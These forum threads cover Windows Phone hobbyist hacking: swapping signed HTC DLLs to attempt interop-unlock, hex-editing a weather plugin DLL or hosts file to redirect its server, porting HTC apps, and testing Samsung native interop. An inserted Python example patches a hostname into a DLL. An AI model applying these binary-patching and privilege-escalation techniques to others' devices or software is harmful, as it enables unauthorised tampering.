[Q] Anyone knows the install path of HTC Connection Setup? - Windows Phone 7 Development and Hacking

I just need the location of HTC_ConnectionSetup.dll to do some experiment.
But I don't have interop-unlocked HTC device. (This is also what I'm trying to do)
Can someone with an interop-unlocked device share the path?
Thanks in advance.

Hi, you cannot get HTC_ConnectionSetup.xap from the Marketplace now.
The only way is to get the original ROM for your device; the ConnectionSetup is in the ROM.

\Applications\Install\5EDBDBBC-2AB2-DF11-8A2F-00237DE2DB9E\Install\HTC_ConnectionSetup.dll
Best of luck to you! If you need somebody to test something, let me know.
You're welcome!

Thank you guys. My first experiment failed.
Here is what I tried.
- Make a fake HTC_ConnectionSetup.dll; it does write to the registry
- Replace HTC_ConnectionSetup.dll with the faked one
- Launch. Screen went black, then the program exits
So, as Heathcliff74 pointed out, the faked HTC_ConnectionSetup.dll is not part of the Connection Setup app any more, so the OS simply refuses to execute it.
Going to find some other exploits.

You also may have gotten the namespaces not perfectly right. I've had that happen when I change a DLL or app namespace inside one of my own apps (instead of replacing another one).
However, the fact that Connection Setup is a marketplace app and therefore signed (which allows it to use ID_CAP_INTEROPSERVICES even without interop-unlock) may be stopping you too. If the signature is verified each time the app is launched (completely reasonable), then modifying any of the app's binaries won't work.

I'll double check the namespace. I remember I put the correct one.
But, as I've messed up Connection Setup too much, and it is no longer available on marketplace, I'm going to try hacking another HTC app.

Related

HTC Homeplug Weather fix - get your LOCAL weather! [New universal patch uploaded!]

THIS SERVER HAS NOW BEEN DEACTIVATED - See below / my final post
WARNING! The old IP-based/Pocket Hosts method using my server HAS BEEN DEACTIVATED, as I have had to remove the code in question from the direct IP. This means that if you select the custom weather server purely via the HTC Home customizing utilities without installing a patched version of the HTC Home DLL, it WILL NOT WORK and you will just get "unable to retrieve data" messages. If this is the case, please uninstall your existing HTC Home plugin, and use one of the ones off the download page.
You can, if necessary, set up your own IP address to base it on, if you can't use my system for some reason, and use the pocket host method that way (requires your own server). Otherwise, please use the cabs below.
NEW! UNIVERSAL PATCH PACKAGE
I've written a universal patcher, so people can now get the HTC Home package they want, and just patch the HTCHome.dll from \WINDOWS. Simply get the package, unzip, drop your HTCHome.dll file in the N2A-Patcher folder, and run the n2a-patcher script inside. It'll magically create you a package! (This won't work for DLLs which people have already patched; you need to use the unmodified original.) This should negate the need for me to create individual packages anymore. Feedback welcome! As a result, I won't be releasing any more complete packages - just install your personal favorite, get the \WINDOWS\HTCHome.dll from your device, drop it in the packager, let it do its magic, then install the newly created cab.
Coming soon, if I can figure it out - drop the installer in, and get a patched full installer out! Of course, I have to figure out how to batch extract the cabfile correctly first... *laughs*
I've also just created a DLL to CAB packager (so you can drop your own pre-patched DLL in, and it'll turn it into a ready-to-install cabfile), and a DLL patcher (which just patches the DLL itself, ready for cooking etc - perfect for all you flashers out there!) - all on the download page.
PLEASE DON'T PM ME ABOUT THIS - KEEP IT TO THE THREAD UNLESS I SPECIFICALLY REQUEST A PM OR PM YOU!
Help Request
If anyone has an unpatched Sprint Touch XML file, I could do with a backup copy, for those who corrupt their XML files...
If you've got a Touch, Kaiser/TyTN II or Sprint Touch...
There are specific device DLL replacement packages on the new file download page.
NEW DOWNLOAD AND INSTRUCTION SITE
I've moved all the downloads and instructions to a new page, which will hopefully make it clearer on what people need to download. It also contains full instructions on hexediting the DLL if you wish, and re-signing. I'm not entirely sure if it's more readable or not, but it's certainly more manageable! Feedback welcome. There's some specific overlays now for certain versions of the ROMs too.
FAQ:
Can I install colour customisations to this?
Sure. Take a look around the forum. There's plenty of guides elsewhere.
What does this do?
It reroutes the request to the AccuWeather server to my server instead, which then requests the appropriate data from the AccuWeather server, and translates it into the HTC Weather XML format.
Can I run this via my own server?
Yup. It's running on mine via PHP 5.2.x, using the SimpleXML extension. The code is downloadable from the main download page, and I've even commented it. Once you get it running, you'll need to hexedit the HTCHome.dll file in the same way as described for the ROM chefs. I'd recommend keeping the same length of file for replacement - using directories to pad it out if necessary - it could cause unpredictable results otherwise.
Do I need to run my own server to get my local weather?
Nope, feel free to use mine.
Your server isn't working!
Oops. It's a rarity, but occasionally network outages happen. The server won't be disappearing anytime soon though without any warning! I'm sorry to say that I'll be taking the server down for this shortly as I'm wrapping up my web hosting business and transferring it to another company, but quite a few other people seem to have hosted a copy if people still need it. I hope it's been of use over the years everyone!
Why have you done this?
It was really annoying me that I could only get the weather for a city 25 miles away, that had nothing to do with mine.
Can you make me an XML file for such-a-place?
No, I've done enough already, and it's documented fairly heavily above. If you can't follow instructions, give up and stop trying to hack your phone. I'm not here to hold your hand. I'll help fix bugs and obvious issues, but if you can't edit a textfile, you're on your own.
Release Notes
I've stripped most local data from the return info apart from the town/city and country, but the HTC plugin seems to ignore that anyway. Works for all international locations I've tested. I welcome feedback on anything that's not working though, and I'll try to get it nailed pretty quickly. As said above, also works on zip codes, which will make it easier for our US friends on here.
New release fixes countries that weren't in the list, by removing the country checks altogether - I'm confident it'll "just work" - in theory. Report bugs in the usual way.
Known Issues
The WM5 version will NOT update over GPRS/3G, unless you are using an AKU3.3 ROM. WM5 Weather update over GPRS has been proven with Wizard AKU3.3 (like the T-Mobile or WM5SEr5). Other devices/ROM's still to be confirmed.
The temperature in Fahrenheit can occasionally be a degree or two out, as I convert from the Celsius scale. To get both readings would mean two calls to the server, which would be more work and bandwidth for my server. I'm sure you can live with a degree out occasionally.
Kudos
Thanks PAPPL for the info on signing files, Schen for his great work on the plugin, and to all those who contributed to getting these plugins (and getting them working!) in the first place!
Enjoy!
As I've taken the server down, I've attached all the relevant files to this post. If someone does want to provide somewhere to point the weather.not2advanced.com domain to, I still own the domain and can add the appropriate A address to it for the purpose if they want to continue hosting for the many users that still seem to be using this plugin. Sorry I had to take it down, but I no longer run the hosting operation this was being held on, and it can be a bit heavy on resources at times.
- Rick
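A small check for the same-length rule in the FAQ above (an added example, not N2A's patcher or any code from the thread): it locates the hostname in a DLL image in both ASCII and UTF-16LE form, pads a shorter replacement with a directory segment up to the original length, and refuses a longer one, so the patched image never changes size or overruns neighbouring data. The DLL bytes, the feed path and the replacement host wx.example.net are constructed placeholders.

```python
"""Same-length hostname patching check for the hex-edit step in the FAQ.

Added example, not the thread's own patcher. Overwriting a string in a
binary with a longer one spills into whatever follows it (the cause of the
"unpredictable results" the FAQ warns about), so the patch is only applied
when every replacement has exactly the original byte length.
"""


def find_host_strings(blob: bytes, host: str) -> list:
    """Return (offset, encoding) pairs where host occurs as ASCII or UTF-16LE.

    Windows Mobile DLLs commonly store URLs as wide strings, so both
    encodings are scanned; every hit must be patched for the redirect to hold.
    """
    hits = []
    for enc in ("ascii", "utf-16-le"):
        needle = host.encode(enc)
        start = 0
        while (idx := blob.find(needle, start)) >= 0:
            hits.append((idx, enc))
            start = idx + len(needle)
    return hits


def pad_replacement(new_host: str, target_len: int) -> str:
    """Pad new_host with a directory segment so it is exactly target_len chars.

    The server behind new_host must then serve the feed under that extra
    directory (e.g. http://wx.example.net/pppp/<original path>).
    """
    if len(new_host) > target_len:
        raise ValueError(
            f"{new_host!r} is {len(new_host)} chars; original is {target_len}. "
            "A longer replacement would overrun the string; pick a shorter host.")
    pad = target_len - len(new_host)
    if pad == 0:
        return new_host
    # "/" plus filler letters keeps the value a valid URL prefix.
    return new_host + "/" + "p" * (pad - 1)


def patch_host(blob: bytes, old_host: str, new_host: str) -> bytes:
    """Return a copy of blob with every old_host replaced, length preserved."""
    hits = find_host_strings(blob, old_host)
    if not hits:
        raise ValueError(f"{old_host!r} not found in image")
    replacement = pad_replacement(new_host, len(old_host))
    out = bytearray(blob)
    for off, enc in hits:
        old = old_host.encode(enc)
        new = replacement.encode(enc)
        assert len(new) == len(old)  # same char count and fixed-width encoding
        out[off:off + len(old)] = new
    if len(out) != len(blob):
        raise AssertionError("patched image changed size")
    return bytes(out)


# Constructed stand-in for HTCHome.dll: an ASCII URL and a UTF-16LE hostname
# embedded between padding bytes. Not real DLL content; the path is made up.
FAKE_DLL = (
    b"MZ\x90\x00" + b"\x00" * 12
    + b"http://htc.accuweather.com/feed?loc=%s\x00"
    + b"\x00" * 8
    + "htc.accuweather.com".encode("utf-16-le") + b"\x00\x00"
    + b"\x00" * 16
)


def demo() -> bytes:
    """Patch the constructed image to the placeholder host wx.example.net."""
    return patch_host(FAKE_DLL, "htc.accuweather.com", "wx.example.net")


if __name__ == "__main__":
    patched = demo()
    print(find_host_strings(patched, "wx.example.net/pppp"))
```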
Wow, sounds like a lot of work went into this.
Do you think it would be possible, using this framework, to pull data from the NWS website instead of Accuweather?
Theoretically, I could, providing they set up an appropriate XML feed. However, I can only do one such setup per IP address (and the IP addresses I have are somewhat limited), but if someone wanted to set it up, I've no doubt it'd be possible. However, it wouldn't be trivial - I've had to manually grab bits of data from the XML and process it into the format the home plugin expects. As a UK resident, the NWS isn't huge amounts of use to me.
On a more technical note though, it'd require a similar format - at least 5 days in advance for a particular area, and the exact parameters (or something that can be adjusted / mangled / processed into the exact parameters) that the plugin needs. (Take a look at the code in the zipfile if you want to see how much of a pain in the neck THAT was!) Adapting it would also need a complete conversion matrix, or a hacky method using (say) the RSS feed ID for the BBC, or however the NWS does it.
Will this work for cingular/att customer?
If it works already for the major cities, then it'll work the same way, but with more localised weather available.
If you're having trouble with the normal weather plugin setup though, you may still have trouble. Then again, it might work! I've no idea. Try it and find out
Yeeaah
Hi N2A / Rick.
Great job - really! I can't thank you enough.
It finally works for me.
Thanks
HTC Homeplug Weather
Hello,
Thanks for sharing your great work. (I am French, so sorry for my poor English.)
However, I'm working on HTC Homeplug Weather because it won't let me download the weather forecast when I am using a 3G connection.
It works great when I am using a wifi connection, so I think it is coming from the proxy of Vodafone France (SFR) which is blocking the access. So I was wondering if I will be able to connect to your server? (For the moment it is not working.) Or redirect the plugin to my tunnel...
Second, is there a way to be sure that the HTC weather plugin is trying to connect to htc.accuweather.com and not to another web site?
Thanks in advance
A French guy who is also living in a small city and wishes to have his weather forecast ;-)
TorbenKB said:
Hi N2A / Rick.
Great job - really! I can't thank you enough.
It finally works for me.
Thanks
You're most welcome. Glad I could help.
gdbtg said:
Hello,
However, I'm working on HTC Homeplug Weather because it won't let me download the weather forecast when I am using a 3G connection.
It works great when I am using a wifi connection, so I think it is coming from the proxy of Vodafone France (SFR) which is blocking the access. So I was wondering if I will be able to connect to your server? (For the moment it is not working.) Or redirect the plugin to my tunnel...
Second, is there a way to be sure that the HTC weather plugin is trying to connect to htc.accuweather.com and not to another web site?
Thanks in advance
A French guy who is also living in a small city and wishes to have his weather forecast ;-)
Well, if it's the HTC accuweather site specifically blocked, then it will help you. If it's generically blocking sites, then it won't.
Re a tunnel - depends what you mean by it.
The HTC home plugin *always* tries to connect to htc.accuweather.com - hence the host file change, which diverts it to my server instead, which provides the correct data. (NO LONGER APPLIES WITH NEW PLUGINS!)
However, if it's still not working with the hosts file modification (may require soft reset, not sure!), then I'm afraid there's not a lot I can do, unless you can tunnel it as you said, but it depends on what you're using to tunnel.
HTC Homeplug Weather
Thanks for your quick answer !
It's still not working ;-(
But I'm wondering how I can test if Pocket Hosts is properly redirecting the HTC weather address.
Sincerely
gdbtg said:
Thanks for your quick answer !
It's still not working ;-(
But I'm wondering how I can test if Pocket Hosts is properly redirecting the HTC weather address.
Sincerely
***************** REMOVED OLD CONTENT, NO LONGER APPLIES WITH THE NEW PLUGINS *****************
HTC Homeplug Weather
Ok, I have got the web site and not the error message.
So there is something wrong.
Thanks for your help.
Before I can try your nice work, I have a problem with the write protection of the hh_0407_weather... file. I don't get my own file in the folder. I tried some things but it didn't work.
Can you help me? I'm running a B&B v3.7 Ger beta.
Thanks
gdbtg said:
Ok, I have got the web site and not the error message.
So there is something wrong.
Thanks for your help.
Reload pocket hosts - it should look something like the attached thumbnail. If it does, try a soft reset. However, if it's still refusing point blank, it's highly possible you're going via a proxy, and that is handling the DNS lookups. To bypass that will require a hack to the HTC plugin itself. I can set it up server side for it (which was going to be my initial approach!), but it'll need an appropriate hostname hacking into the binary. I'll see what I can do on that score tomorrow, both on the home plugin front and the server-side setup.
smallgermanboy said:
Before I can try your nice work, I have a problem with the write protection of the hh_0407_weather... file. I don't get my own file in the folder. I tried some things but it didn't work.
Can you help me? I'm running a B&B v3.7 Ger beta.
Thanks
I suggest using Total Commander - you can remove the read-only flag from there, and even edit it inside it. Works beautifully.
I use Total Commander, too. But when I open the file, Internet Explorer opens and displays the XML file. I tried to remove the flag but it didn't accept it. So I looked at the attributes again and nothing has changed.
smallgermanboy said:
I use Total Commander, too. But when I open the file, Internet Explorer opens and displays the XML file. I tried to remove the flag but it didn't accept it. So I looked at the attributes again and nothing has changed.
I'm assuming that's after you've gone to the file properties. You should be able to unclick "Read-only" and "System" on it.
There's quite a bit of information on doing this scattered around the forums. Is it cooked into your ROM? (It'll have a tickbox by the "In ROM" box if that's the case.) But you want to clear the Read Only and System attributes from the file properties if you can, THEN edit it.
More information on this thread.
N2A said:
I'm assuming that's after you've gone to the file properties. You should be able to unclick "Read-only" and "System" on it.
I did this but when I open the properties again the attributes for "Read-only" and "System" are still on.
There's quite a bit of information on doing this scattered around the forums. Is it cooked into your ROM? (It'll have a tickbox by the "In ROM" box if that's the case.) But you want to clear the Read Only and System attributes from the file properties if you can, THEN edit it.
It's in the ROM.
There's your problem. I suggest copying it somewhere else on the device, editing it, and copying it back, but it may have issues doing it.
If you can't copy it back, apparently Resco Explorer is able to do it.
I used Resco to do it. You have a 14-day free trial so you can test it first.
http://www.resco.net/pocketpc/explorer/downloads.asp
And thanks N2A, this is really great. It works perfectly and can find all the small places in Norway.
ialu said:
I used Resco to do it. You have a 14-day free trial so you can test it first.
http://www.resco.net/pocketpc/explorer/downloads.asp
And thanks N2A, this is really great. It works perfectly and can find all the small places in Norway.
Thanks for both
I copied it with Resco and now it works perfectly. I tried several small cities in Germany and it found them all. THANKS again
Thanks. Works great. Now I know it's going to rain all week here in Abergavenny.

[RELEASE] HTC Hub for everyone!

Hi,
You can download the rar's. They contain the xap. You can use any dev-unlocked device (also non-HTC). This was quite a reversing-adventure. I learned a lot.
A few remarks:
- This is not the latest version of the HTC Hub. It does not have the live-tile. Maybe I'll update later.
- I had to rewrite some parts of the code. It all works 100% but I think it can be done better, so maybe I'll update that later.
- Note the about screen
Word! It works but it still *****es about not being able to reach HTC's service. Great job regardless Heathcliff.
EDIT: The wild thing about it is, I can actually reach into HTC's section of the Marketplace through this app. That's crazy.
want to try
but I am getting errors unzipping with 7zip, what is the way you guys are successful with?
Heathcliff74 said:
Hi,
You can download the rar's. It contains the xap. You can use any dev-unlocked device (also non-HTC). This was quite a reversing-adventure. I learned a lot.
A few remarks:
- This is not the latest version of the HTC Hub. It does not have the live-tile. Maybe I'll update later.
- I had to rewrite some parts of the code. It all works 100% but I think it can be done better, so maybe I'll update that later.
- Note the about screen
Good work. Works on my Omnia7, the graphics look like sh*t though on my lovely screen
I don't get any errors or anything here - weather/time/location all work great. As fb401 says - you can access the HTC Marketplace, but you can access any Marketplace app as long as you know the ProductID.
Does access to the other apps from the marketplace on the phone allow use of the excellent HTC flashlight app or any additional HTC apps?
fb401 said:
Word! It works but it still *****es about not being able to reach HTC's service. Great job regardless Heathcliff.
EDIT: The wild thing about it is, I can actually reach into HTC's section of the Marketplace through this app. That's crazy.
Anyone having the message about not being able to reach the HTC server, plz verify that you have either Wifi or cellular connection and try refresh-button. It definitely works.
buffalosolja42 said:
but I am getting errors unzipping with 7zip, what is the way you guys are successful with?
Download both parts in the same folder and use WinRar.
jessej said:
Does access to the other apps from the marketplace on the phone allow use of the excellent HTC flashlight app or any additional HTC apps?
No, it won't work. You can try to install, but the program will try to use the HTC drivers and hardware, and it will quit. These programs need (a lot of) work to get running on other devices. Look here and here.
Heathcliff74 said:
Anyone having the message about not being able to reach the HTC server, plz verify that you have either Wifi or cellular connection and try refresh-button. It definitely works.
I was still plugged into my laptop in airplane mode. When I disconnected and went back, it worked perfectly.
Blade0rz said:
As fb401 says - you can access the HTC Marketplace, but you can access any Marketplace app as long as you know the ProductID.
Sure you can, but there's literally no way inside of the HTC walls on my LG phone besides this hub.
getting crc failure from file htchub1
edit*** downloaded on fedora then transferred to vm win7 and looks like file is ok after crc check
well done
thank u
Excellent job, will be bookmarking this thread to see if the live tile gets added. Great work Heathcliff.
Is it possible to get the HTC Connection Setup app to work on a non-HTC phone?
slysy said:
Is it possible to get the HTC Connection Setup app to work on a non-HTC phone?
I guess you're asking this to be able to get provxml working. Well, that's not really possible. Because the HTC Connection Setup calls the HTC drivers which will in turn process the provxml. So I would be able to get the HTC Connection Setup running, but it will not be able to call the driver on non-HTC devices. I guess in time we'll find the necessary security holes to get in the TCB chambers to execute these types of code and config files.
The OEM drivers are very useful, because they provide (limited) access to the high-privilege TCB chambers. The drivers contain hardware-specific functions and non-hardware-specific functions. Those non-hardware-specific functions (like registry and file-system access) are the most interesting for us. The drivers can be called from unmanaged code, which in turn can be called by managed code through a COM interface. But since we have no way to port drivers between devices (yet), those non-hardware-specific functions remain device-specific for now.
Heathcliff74 said:
I guess you're asking this to be able to get provxml working. Well, that's not really possible. Because the HTC Connection Setup calls the HTC drivers which will in turn process the provxml. So I would be able to get the HTC Connection Setup running, but it will not be able to call the driver on non-HTC devices. I guess in time we'll find the necessary security holes to get in the TCB chambers to execute these types of code and config files.
The OEM drivers are very useful, because they provide (limited) access to the high-privilege TCB chambers. The drivers contain hardware-specific functions and non-hardware-specific functions. Those non-hardware-specific functions (like registry and file-system access) are the most interesting for us. The drivers can be called from unmanaged code, which in turn can be called by managed code through a COM interface. But since we have no way to port drivers between devices (yet), those non-hardware-specific functions remain device-specific for now.
Thanks for the response. I asked because the Samsung Connection Setup app doesn't support my network, so I can't configure or use MMS. I know that the HTC Connection Setup app does however, so I want to use it to configure my network settings. Do you think this is possible (I didn't understand everything you said, so sorry if this is a silly question)?
slysy said:
Thanks for the response. I asked because the Samsung Connection Setup app doesn't support my network, so I can't configure or use MMS. I know that the HTC Connection Setup app does however, so I want to use it to configure my network settings. Do you think this is possible (I didn't understand everything you said, so sorry if this is a silly question)?
Hmm.. I don't know about that. HTC Connection Setup is not a solution, because you don't have the necessary drivers on your device. Samsung has a set of predefined XMLs in the \windows folder. Every country has its own XML with the settings of the known network operators. There is a trick to configure one of these. Info is in this thread. But I'm not sure if there is an XML on your phone that contains the info for your network operator. Good luck.
Heathcliff74 said:
Hmm.. I don't know about that. HTC Connection Setup is not a solution, because you don't have the necessary drivers on your device. Samsung has a set of predefined XMLs in the \windows folder. Every country has its own XML with the settings of the known network operators. There is a trick to configure one of these. Info is in this thread. But I'm not sure if there is an XML on your phone that contains the info for your network operator. Good luck.
wow it works well
now the question is
will the youtube app receive the same treatment?
domineus said:
wow it works well
now the question is
will the youtube app receive the same treatment?
Haha. Well, I haven't taken a look at that one. But I can assure you that reversing a Windows Phone Silverlight app is a very complex task. I have done this once, so I could maybe do it again. Depends on how much of the HTC driver has to be rewritten for that app. But I probably won't do that very soon. The truth is that I did this mainly to learn about the inner works of Windows Phone and Silverlight. And I have a couple of other 'projects' I'm working on, so I want to focus on that. Maybe someone else will pick up the task for the Youtube app.
thx Heathcliff74
Heathcliff74
Thank you for the hub.
Do you know any way to add a driver from HTC to another OEM's device?
Long ago I had an Omnia 2 and we could add some DLLs to \windows to make things compatible with Samsung.
Do you think it could be possible to play with the YouTube app from HTC? I can get it to open but I don't have a connection.
ronalgps said:
do you know any way to add driver to other OEM from htc
At this moment we have no way to exchange drivers from different OEMs. Read my post earlier in the thread. Maybe I'll have a look at the Youtube app, but don't count on it. I'm very busy.
Works great on my Omnia7!!!! What will happen if I update the hub via the Marketplace?

[XAP][SOURCE][MANGO] Samsung gen2 interop test app v2

All right folks - several hours later than I wanted to get this out to you, but here it is. Blame my new cat, she's wonderfully distracting.
Requirements:
Samsung generation-2 WP7 device (Focus S or Focus Flash/Omnia 7 S).
Dev-unlocked (ChevronWP7 Labs or AppHub).
Interop-unlocked (yes, it works on your phones).
XAP deployment tool (any).
Helpful:
Screen capture app (good way to report results that are too long to type).
Good software testing skill (mostly, give me info as complete as you can).
A recent backup, if you're worried about damage, unless you're willing to hard reset.
Instructions:
Download the attached ZIP archive.
Extract the XAP file from the Bin\Debug\ folder.
Deploy the XAP to your phone.
Run the app (SamsungTest).
Note the initial message box with your phone name, case sensitive.
Tap the buttons to run tests.
Note the results of each test.
Note any exceptions that occur.
Report the results, including phone name, test output, and exceptions (with context).
Note: The Audio Mute test is a toggle; press it again to switch back. It is the only test that should modify your phone in any way, and should be both minor and easily reverted.
Developers:
The full source code of the app is attached, including the most important file (Samsung2Interop.cs), a helper with many useful constants (SamsungWin32.cs), and the native COM DLLs. You can see how I use the DLLs and how to build your own apps, or modify existing apps, using them.
Thanks sent to the first few people to give useful reports!
SAMSUNG SGH-i937
Wireless: app closes out.
Audio:
"Unexpected exception please report!
System.IO.FileNotFoundException: The system cannot find the file specified as..."
(the above lines are what is cut off from the top of the message in the picture i attached below)
Get IMEI: app closes out
File Listing: "Your documents folder contains these files:" [ok]
Directory List: "Your root directories are:" [ok]
Registry: "Sub-keys of HKEY_CLASSES_ROOT\bmpimage :\n" [ok] (app closes when pressing [ok])
Provxml: "Provxml query output:" [ok]
Well, that's a weird and disappointing result. I figured some might not work, but I didn't expect them all to fail and most certainly didn't expect either the app to crash silently or to get a FileNotFoundException!
OK, I've put together a v2 of the test app. It's got very few test changes, but should help me pinpoint the problem better, I hope...
One request when testing: I'm much more interested in the top of the exception than the bottom of the stack trace, so if you're going to screenshot part of it, go for that part. Thanks!
SAMSUNG SGH-i937
wireless closes app
audio mute screenshot attached
get imei closes app
file listing Your documents folder contains these files: ok
Directory List test Your root directories are: ok
Registry HKEY_CLASSES_ROOT\bmpimage:
Provxml Provxml query output: ok
Gotcha. Will test after class.
Went ahead and gave it a try before taking off. If the download file in the first post is the updated test file, then I'm afraid it yields the same results, on every test :-/
Mine was done after you posted about the V2 file also.
Wireless test exits the app
Get IMEI exits the app
The rest go as follows
ManelScout4Life said:
Wireless test exits the app
Get IMEI exits the app
The rest go as follows
mine is exactly the same (same phone as well)
OK, I clearly need to investigate this more. It sounds like there's a systemic issue with how I'm accessing this data, although there are a few more tweaks I can make to the test. I'd be interested to get results from the other Samsung phone, the Focus Flash, but I doubt anything except the first message will be different.
I'll post a new version or two later today. I want to take another look at exactly how the code gets called by the Diag app, just in case there's some weird initialization step or something.
GoodDayToDie said:
OK, I clearly need to investigate this more. It sounds like there's a systemic issue with how I'm accessing this data, although there are a few more tweaks I can make to the test. I'd be interested to get results from the other Samsung phone, the Focus Flash, but I doubt anything except the first message will be different.
I'll post a new version or two later today. I want to take another look at exactly how the code gets called by the Diag app, just in case there's some weird initialization step or something.
I can test it on my new Samsung Omnia W (Focus Flash), but can you explain to me how to convert the source into a .XAP?
AdryJay said:
I can test it on my new Samsung Omnia W (Focus Flash), but can you explain me how to convert the source in a .XAP?
If you're just trying to test it, the XAP is in the folder mentioned in the OP; there's no need to build the XAP, as it's done already.
If you want to play with the source and build an alternate XAP to test, that's another question that I'm sure someone can answer.
adiliyo said:
if you're just trying to test it, the xap is in the folder mentioned in the OP, there's no need to build the xap, as it's done already.
if you want to play with the source and build an alternate xap to test that's another question that i'm sure someone can answer
Found it...
SAMSUNG GT-I8350
Wireless Test: The app crashed.
Audio Mute Test: Unexpected exception, please report!
System.IO.FileNotFoundException: The system cannot find the file specified.
   at SamsungTest.MainPage.TestAudioMute()
   at SamsungTest.MainPage.TestAudioMute_Click(Object sender, RoutedEventArgs e)
   at System.Windows.Controls.Primitives.ButtonBase.OnClick()
   at System.Windows.Controls.Button.OnClick()
   at System.Windows.Controls.Primitives.ButtonBase.OnMouseLeftButtonUp(MouseButtonEventArgs e)
   at System.Windows.Controls.Control.OnMouseLeftButtonUp(Control ctrl, EventArgs e)
   at MS.Internal.JoltHelper.FireEvent(IntPtr unmanagedObj, IntPtr unmanagedObjArgs, Int32 argsTypeIndex, Int32 actualArgsTypeIndex, String eventName)
Then it crashed.
Get IMEI Test: The app crashed.
File Listing Test: Your documents folder contains these files: OK
Directory List Test: Your root directories are: OK
Registry Test: Sub-keys of HKEY_CLASSES_ROOT\bmpimage : OK
Then the app crashed.
Provxml Test: Provxml query output: OK
Hope this helps you... ^^
Well, it confirmed two things: the string I can use to identify the Focus Flash, and that the problem with the app is not specific to the Focus S. At this point, that's almost more reassuring than if it had worked, since at least that means there aren't per-phone differences.
GoodDayToDie said:
Well, it confirmed two things: the string I can use to identify the Focus Flash, and that the problem with the app is not specific to the Focus S. At this point, that's almost more reassuring than if it had worked, since at least that means there aren't per-phone differences.
Do you have a Focus Flash/S to play with, GDTD?
I believe the reason why we're having issues is that Samsung changed the driver DLLs, which would mean we would need to find a XAP from the Marketplace that has references to the gen2 DLLs. Or am I missing something?
@Jaxbot: No I don't, which is why I created this thread; I needed testing from people who do.
Your guess is exactly correct. I've already got a few interop-enabled XAPs from various helpful people with gen2 phones (some come from marketplace, some from the \Windows folder using the webserver app). I've decompiled them enough (I thought) to re-package the COM DLLs they use for homebrew use. However, it's not working, and is throwing some really weird errors (the "FileNotFound" one is bizarre, the simple crashing almost worse). So, I'm digging deeper and trying to figure out why. Worst case, I disassemble/decompile the native COM DLLs and try to figure them out. That'll take a while - I can read (some) ARM assembly and C++, but even if the decompiler does a good job it's still going to be slow work - so I'm hoping it doesn't come to that. Managed code is usually easier to reverse engineer.
I have a Samsung Focus Flash with interop unlocked and ICS working.
I'm not sure what this XAP test is for. Can anyone please fill me in so that I may be able to help?
Thanks!
GoodDayToDie said:
@Jaxbot: No I don't, which is why I created this thread; I needed testing from people who do.
Your guess is exactly correct. I've already got a few interop-enabled XAPs from various helpful people with gen2 phones (some come from marketplace, some from the \Windows folder using the webserver app). I've decompiled them enough (I thought) to re-package the COM DLLs they use for homebrew use. However, it's not working, and is throwing some really weird errors (the "FileNotFound" one is bizarre, the simple crashing almost worse). So, I'm digging deeper and trying to figure out why. Worst case, I disassemble/decompile the native COM DLLs and try to figure them out. That'll take a while - I can read (some) ARM assembly and C++, but even if the decompiler does a good job it's still going to be slow work - so I'm hoping it doesn't come to that. Managed code is usually easier to reverse engineer.
Of course managed code is easier to reverse engineer..you can get the actual source back =P
Anyway, I'd help out, but I don't have a Flash or S either... It's certainly possible, but not without a lot of tinkering.
I wonder if Samsung did this intentionally to screw with us, or if it's just a coincidence (new drivers, etc).
wsantiagow said:
I have a Samsung Focus Flash with interop unlocked and ICS working.
I'm not sure what this XAP test is for. Can anyone please fill me in so that I may be able to help?
Thanks!
Just read the thread man, it's two pages long.
Any news about the development?
Sorry man, got wrapped up in trying to interop-unlock Nokia and then HTC phones, and haven't gotten back to this app yet. It's on my mind, don't worry - there's just only so many things I can do in a day, especially when Minecraft release just came out.
I'll try to have a new version shortly after Thanksgiving. I've got a pretty good idea now what's wrong, but I have to figure out how to work around it.

[XAP][ZIP] Access OEM Marketplaces easily, no dev unlock! (Update 16 Aug 2013)

Hi hackers!
Found something pretty cool while I was digging around looking for new interop-unlock hacks. The bad news is that it looks like it's not usable for interop unlock, the good news is that it's still pretty cool.
This previously required a dev-unlock, but no longer does. It does not require interop-unlock. It works on all phones (as far as I know).
UPDATE 3: ZIP file usable on non-unlocked phones EDIT: I think this will not work on most phones. Sorry! The XAPs still work, if you can sideload them
I've added a ZIP file that can be used to switch the OEM Marketplace without needing to sideload a XAP at all. Instructions are inside, but basically you tap the XML file for the OEM you want, then reboot the phone.
UPDATE 2: Dell Apps.xap, Nokia Apps.xap (v2)
The Dell apps collection is hidden, like the Nokia one was (see Update 1 below). The only app I was able to find was "Newsroom" (another app kind of like HTC Hub). If there are others, please let me know and I'll try to find them.
Nokia has collected their apps into a single marketplace section, like HTC/Samsung/LG. The new Nokia Apps.xap reflects this, so disregard the Update 1 note below for Nokia, and download the new XAP!
UPDATE 1: Nokia Apps.xap (See the Update 2 note - Nokia Apps.xap has been changed)
Be aware that this app works a little differently. Rather than actually adding a "Nokia" store to your Marketplace list, it just enables your phone to access Nokia's apps through the normal marketplace. Not sure why some OEMs did their own store and others didn't, but that's why it wasn't working before (it isn't a stand-alone store section).
An easy way to find the Nokia apps is to do a search for a well-known app, like Nokia Maps. Then, open it and tap the "More from Nokia Corporation" link. This will take you to a list of all of Nokia's apps.
WHAT IS IT?
Install a XAP or tap an XML file in the ZIP, and restart your phone. Then, open the marketplace, and you'll discover that, instead of "HTC Apps" or "Samsung Zone" or whatever your default is, you can install OEM apps from a different OEM.
WHAT CAN I DO?
If you want to install Nokia, HTC, Samsung, LG, or Dell apps, open the ZIP file on your phone, look for the OEM name you want, and tap the XML file immediately under that OEM name. You'll need to restart your phone before the Marketplace changes.
If you want to help out, give me as much info as you can about the other OEM marketplaces (Toshiba/Fujitsu, perhaps?)
IS IT DANGEROUS?
Well, it's a hack. There's always *some* danger. However, you don't need to worry very much. The phone will automatically revert the Marketplace after a day or so. You can also get your proper marketplace back by installing the corresponding app/tapping the desired ZIP.
However, you *really* should keep an up-to-date restore point any time you're messing with stuff like that, especially with new hacks. If something screws up and doesn't straighten out, restore a backup or hard-reset and it will fix itself.
EDIT: The ZIP does not appear to work on most phones. The XAP files should still work on 7.8, though.
WHO CAN I THANK?
Well, aside from myself thanks go to:
Heathcliff74, for the XAP deployer hack and the Samsung marketplace configuration file.
Schaps, for TouchXplorer (let me find the relevant file).
Voluptuary, for info about both OEM and MO marketplaces (working on those).
wpxbox, for the info about "Nokia collection".
CAN I ASK A QUESTION?
You just did, or at least, I did for you. Please see the next post after this one for FAQ. Otherwise, feel free to post a reply with your question. Please, if it's at all relevant, include the make, model, and version of your phone and OS/firmware.
OK, I know you all will have some questions. I'll try to collect them, and their answers, here so people don't have to read every post.
